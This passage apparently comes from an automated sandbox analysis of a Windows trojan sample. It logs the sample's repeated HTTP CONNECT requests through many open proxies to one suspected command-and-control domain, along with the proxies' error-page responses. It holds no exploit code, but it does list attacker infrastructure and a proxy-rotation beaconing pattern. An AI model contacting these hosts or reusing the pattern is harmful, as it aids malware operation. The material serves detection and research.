                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 79 6f 75 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at you@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.48 (Unix) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                196192.168.2.850643103.118.46.6180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.476648092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.822316885 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                197192.168.2.850752181.209.110.1909995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.482455969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.020791054 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                198192.168.2.850498188.87.137.4531285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.494709969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.940346956 CET1286INHTTP/1.1 403 Forbidden
                                                                                Server: squid/3.5.28
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 1002
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                Content-Language: en
                                                                                X-Cache: MISS from ah_test
                                                                                Via: 1.1 ah_test (squid/3.5.28)
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 31 33 3a 32 38 3a 32 33 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64
                                                                                Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://heygirlisheeverythingyouwantedinaman.com/*">https://heygirlisheeverythingyouwantedinaman.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Fri, 23 Feb 2024 13:28:23 GMT</p></d


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                199192.168.2.850725122.116.150.290005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.494976044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                200192.168.2.85081545.11.95.16550325828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.507812023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                201192.168.2.85076693.90.212.241535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.508203030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                202192.168.2.850717208.109.14.49356185828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.526257992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.210350990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.179183006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.179615021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.194981098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.195072889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                203192.168.2.850715167.172.91.4731285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.528270960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.018083096 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                204192.168.2.850812187.40.1.1221285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.535392046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.737026930 CET39INHTTP/1.1 200 Connection established
                                                                                Feb 23, 2024 14:29:08.917932987 CET1286INHTTP/1.1 500 Internal Server Error
                                                                                Server: squid/5.2
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:29:02 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 17038
                                                                                X-Squid-Error: ERR_CANNOT_FORWARD 0
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 39 66 39 66 39 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 53 65 67 6f 65 2c 20 27 53 65 67 6f 65 20 55 49 27 2c 20 27 44 65 6a 61 56 75 20 53 61 6e 73 27 2c 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 76 69 73 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 63 37 63 61 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 74 69 63 65 6e 63 69 61 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 20 65 6c 6c 69 70 73 69 73 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 39 36 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 43 41 4e 4e 4f 54 5f 46 4f 52 57 41 52 44 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 20 73 74 79 6c 65 3d 22 6d 69 6e 2d 77 69 64 74 68 3a 35 30 30 70 78 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 38 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 0a 3c 69 6d 67 20 63 6c 61 73 73 3d 22 64 65 6e 79 5f 6c 6f 67 6f 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 4e 63 41 41 41 41 76 43 41 59 41 41 41 42
                                                                                Data Ascii: <!DOCTYPE html><html style="background-color: #f9f9f9 !important;font-family:Segoe, 'Segoe UI', 'DejaVu Sans', 'Trebuchet MS', Verdana, sans-serif;"> <head> <meta charset="UTF-8"> <title>Aviso</title> <meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no' name='viewport'> <style> html{background: #3c7ca0 !important;} body{background: transparent !important;height: 100%;} .reticencias { text-overflow: ellipsis; white-space: nowrap; overflow: hidden; width:96%; margin-bottom:0 !important; } </style> </head> <body id="ERR_CANNOT_FORWARD" style="font-size:12px; "> <div class="container" align="center"> <div class="row" style="min-width:500px"> <div class="col-xs-8" style="text-align:center;padding-top:50px; padding-bottom:10px"><img class="deny_logo" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANcAAAAvCAYAAAB


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                205192.168.2.850880162.243.102.20797645828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.538219929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                206192.168.2.850850153.19.91.77805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.538661003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.038467884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.632293940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.941112041 CET829INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Content-Length: 637
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 73 63 40 67 63 69 2e 67 64 79 6e 69 61 2e 70 6c 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ssc@gci.gdynia.pl to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                207192.168.2.850844176.98.81.8580805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.539804935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                208192.168.2.850845212.3.112.128358605828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.543598890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                209192.168.2.850041184.178.172.5153035828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.557529926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                210192.168.2.85072061.133.66.6990025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.568990946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.932751894 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
